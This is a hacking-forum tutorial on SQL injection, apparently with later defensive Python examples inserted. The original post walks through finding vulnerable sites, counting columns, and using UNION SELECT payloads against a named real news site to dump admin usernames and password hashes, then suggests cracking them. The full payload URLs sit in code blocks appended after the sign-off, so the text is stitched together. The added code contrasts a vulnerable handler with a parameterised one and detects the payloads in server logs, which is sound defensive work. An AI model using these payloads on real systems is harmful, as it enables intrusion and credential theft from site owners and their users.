I know what you're thinking. "Another SQL tut? Really, Entity, did we need another?" Well... yes. When I was learning I had to read 4 or 5 tuts to actually get it to work. I'm hoping that this tutorial will help more.
SQL INJECTION
Note :: Neither Hackforums.net nor Entity are responsible for what you do with this information, it is provided for educational purposes only.
Before we even start, you need some tools.
HackBar [FireFox]
Admin Finder [We won't be using the AdminFinder in this tut, but you WILL need it]
Cain and Abel (Google it)
Now, we need a site. To find a site, we need to go to Google, and put in one of the following.
To check if a site is vulnerable, put a ' after it, like so:
You should get an SQL error, like this one:
Okay, now that you have your vulnerable site, I'll show you how to do an SQL injection on it.
I'll be doing my injection on
So, I pull up my site, and I add a ' after it, and I get this.
Remember, when checking the vulnerability, an error is a good thing.
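Why the stray quote produces that error, shown in an added example that is not from the original post: Python's sqlite3 module stands in for the PHP/MySQL setup the tutorial targets, the `news` table and its rows are constructed here, and `fetch_news_vulnerable` (the request parameter pasted into the SQL text, the pattern behind the warning above) and `fetch_news_hardened` (integer validation plus a bound parameter) are assumptions of this example rather than the site's real code.

```python
import re
import sqlite3

# Constructed sample rows standing in for the tutorial's news table (assumption:
# the real news.php schema is unknown; only an id and a title are modelled here).
SAMPLE_NEWS = [
    (5, "Fixture list published"),
    (130, "Match report: away win"),
]


def setup_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", SAMPLE_NEWS)
    return conn


def fetch_news_vulnerable(conn, raw_id):
    """The pattern the tutorial exploits: the request parameter is pasted into
    the SQL text, so a quote or a UNION inside it is parsed as part of the query."""
    sql = "SELECT title FROM news WHERE id=" + raw_id
    return [row[0] for row in conn.execute(sql)]


def fetch_news_hardened(conn, raw_id):
    """Hardened handler: reject anything that is not an integer, then bind the
    value as a parameter so the driver never treats it as SQL."""
    if not re.fullmatch(r"-?[0-9]+", raw_id):
        raise ValueError("id must be an integer")
    rows = conn.execute("SELECT title FROM news WHERE id=?", (int(raw_id),))
    return [row[0] for row in rows]


def probe(handler, conn, raw_id):
    """Run one handler on one input and report what the client would observe."""
    try:
        rows = handler(conn, raw_id)
    except sqlite3.OperationalError as exc:
        # The SQL parser choked on the input: this is the condition behind the
        # "mysql_fetch_array(): supplied argument is not a valid MySQL result" warning.
        return ("sql_error", str(exc))
    except ValueError as exc:
        return ("rejected", str(exc))
    return ("ok", rows)


def run_probes():
    """Compare both handlers on a normal id, the quote test and a UNION payload."""
    conn = setup_db()
    inputs = ["130", "130'", "-130 UNION SELECT 'attacker-chosen text'"]
    return {
        raw: {
            "vulnerable": probe(fetch_news_vulnerable, conn, raw),
            "hardened": probe(fetch_news_hardened, conn, raw),
        }
        for raw in inputs
    }


if __name__ == "__main__":
    for raw, outcome in run_probes().items():
        print(f"id={raw!r}")
        print("  vulnerable:", outcome["vulnerable"])
        print("  hardened:  ", outcome["hardened"])
```

The quote test only tells you something because the concatenating handler hands the quote to the SQL parser; with the hardened handler the same input is refused before any query runs, and a UNION never reaches the database at all. Turning off error display hides the warning but not the bug, which is why the fix is the bound parameter, not the quieter error page.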
Now, I need to find out how many columns are in the site. So I start with:
Always start with 3, because a site has to have at least 3 columns. If you get an error at 3, then your target site doesn't support union statements.
When I order by 3 I get this:
So the site has more than 3 columns. That's a good sign. After 3, I always go to ten. So:
And I get this:
So the site has less than 10 columns. It turns out that this site had 6 columns. So now we need to know which of those columns are vulnerable. So we do this:
NOTICE THE - IN FRONT OF THE 130. It is very important and needs to be there every time you do a UNION SELECT statement. So on our site we get this:
Columns 2, 4, and 5 are vulnerable.
Now we have to find out the SQL version of the site. Version 5 is our favorite, because it has information_schema. information_schema is our friend, because it tells us things, meaning we don't have to guess the table names, like we would in version 4. So to find out what version our site is running, we do this:
Now that we've done that, our site shows this:
Yay! Our site is running version 5. So how are we gonna get the tables? Just like this.
So on our site, you see this:
See where it says tar_admin? That's what we want. But how are we gonna get the info that's in there? Like this. *If you downloaded the HackBar, like I told you to, you're gonna need it*
So, tar_admin is what we want to get into, but putting it in just like that won't work. We need to convert it into CHAR(). The HackBar can do that. Highlight what you want to turn into CHAR() and click MySQL, then MySQL CHAR().
So the whole thing is:
So we do that, and our site shows us this:
Out of that, we want the username and password, right? So, to get that, we do this:
0x3a is the hex for a colon, so don't worry about that.
When we input that, our site shows us this:
You guys know what that is? Those are the usernames and the MD5 hashed passwords. The passwords aren't always hashed. With this particular site, I had bad luck, as the MD5 was salted. Use Cain and Abel or John the Ripper (Linux) to crack MD5.
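The same walk-through seen from the server side, as an added detection example that is not part of the original post: the Apache-style access-log lines are constructed here (the path and payload shapes follow the tutorial's URLs, the client addresses are documentation-range placeholders), and the indicator names, the `analyse_request`/`scan_log`/`summarize_by_client` functions and the CHAR()/0x decoding helpers are assumptions of this example, not any real tool's API.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format log lines. The path and payload shapes follow
# the tutorial's URLs; the client addresses are documentation-range placeholders.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2010:13:55:01 +0000] "GET /news/news.php?id=130 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2010:13:55:09 +0000] "GET /news/news.php?id=130' HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2010:13:55:20 +0000] "GET /news/news.php?id=130%20order%20by%2010 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2010:13:56:02 +0000] "GET /news/news.php?id=-130%20UNION%20SELECT%201,2,3,4,@@version,6 HTTP/1.1" 200 5300 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2010:13:57:45 +0000] "GET /news/news.php?id=-130%20UNION%20SELECT%201,2,3,4,group_concat(column_name),6%20from%20information_schema.columns%20where%20table_name=CHAR(116,97,114,95,97,100,109,105,110) HTTP/1.1" 200 5310 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2010:13:58:30 +0000] "GET /news/news.php?id=-130%20UNION%20SELECT%201,2,3,4,group_concat(username,0x3a,password),6%20from%20tar_admin HTTP/1.1" 200 5400 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2010:14:01:00 +0000] "GET /news/news.php?id=42 HTTP/1.1" 200 5010 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Each stage of the walk-through leaves a distinct token in the query string.
INDICATORS = [
    ("quote_probe", re.compile(r"^\s*-?\d+\s*'\s*$")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("version_read", re.compile(r"@@version|\bversion\s*\(", re.I)),
    ("schema_enumeration", re.compile(r"\binformation_schema\b", re.I)),
    ("concat_dump", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("char_obfuscation", re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+)*\s*\)", re.I)),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]+\b", re.I)),
]
CHAR_CALL = re.compile(r"\bchar\s*\(([\d\s,]+)\)", re.I)
HEX_LITERAL = re.compile(r"\b0x([0-9a-f]+)\b", re.I)


def decode_char_calls(text):
    """Turn CHAR(116,97,...) back into the string it encodes (here: a table name)."""
    decoded = []
    for match in CHAR_CALL.finditer(text):
        codes = [int(c) for c in match.group(1).split(",") if c.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def decode_hex_literals(text):
    """Turn 0x3a-style literals back into text (0x3a is the ':' separator)."""
    decoded = []
    for match in HEX_LITERAL.finditer(text):
        digits = match.group(1)
        if len(digits) % 2:
            digits = "0" + digits
        decoded.append(bytes.fromhex(digits).decode("latin-1"))
    return decoded


def analyse_request(line):
    """Parse one log line and report which injection indicators its query carries."""
    match = LOG_LINE.match(line)
    if not match:
        return None
    parts = urlsplit(match.group("target"))
    finding = {"client": match.group("client"), "path": parts.path,
               "indicators": [], "decoded": []}
    # parse_qsl splits on the first '=' only and percent-decodes, so the whole
    # payload (including any '=' inside it) lands in the parameter value.
    for _name, value in parse_qsl(parts.query, keep_blank_values=True):
        for label, pattern in INDICATORS:
            if pattern.search(value) and label not in finding["indicators"]:
                finding["indicators"].append(label)
        finding["decoded"] += decode_char_calls(value) + decode_hex_literals(value)
    return finding


def scan_log(text):
    """Return the findings for every line that carries at least one indicator."""
    results = []
    for line in text.splitlines():
        finding = analyse_request(line)
        if finding and finding["indicators"]:
            results.append(finding)
    return results


def summarize_by_client(results):
    """Collapse findings per client so the probe -> order by -> union -> schema ->
    dump progression from one source shows up as a single sequence."""
    summary = {}
    for finding in results:
        seen = summary.setdefault(finding["client"], [])
        for label in finding["indicators"]:
            if label not in seen:
                seen.append(label)
    return summary


if __name__ == "__main__":
    flagged = scan_log(SAMPLE_LOG)
    for finding in flagged:
        print(finding["client"], finding["path"], finding["indicators"], finding["decoded"])
    print(summarize_by_client(flagged))
```

Two things are worth noticing when running it: every request in the sequence returned HTTP 200, so status codes alone never flag this, and the CHAR() and 0x encodings that hide the table name and the colon from a naive quote filter decode trivially once the analyst knows to look for them. Grouping by client is what turns six individually plausible-looking requests into one obvious enumeration.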
DO NOT POST ANYWHERE EXCEPT HACKFORUMS OR CODERZUNITED WITHOUT MY PERMISSION.
I hope you enjoyed my tutorial, and I hope that this works for everyone. Post questions or comments here, thanks.
-Entity
Code:
http://www.site.com/news.php?id=5'
Code:
PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\Domains\tartanarmy.com\wwwroot\news\news.php on line 19
PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\Domains\tartanarmy.com\wwwroot\news\news.php on line 25
I'll be doing my injection on
Code:
http://www.tartanarmy.com/news/news.php?id=130
Now, I need to find out how many columns are in the site. So I start with:
Code:
http://www.tartanarmy.com/news/news.php?id=130 order by 3
Code:
http://www.tartanarmy.com/news/news.php?id=130 order by 10
Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,5,6
So to find out what version our site is running, we do this:
Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,@@version,6
Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema= database ()
Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name= tar_admin
Code:
tar_admin = CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)
So the whole thing is:
Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name= CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)
Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6 from tar_admin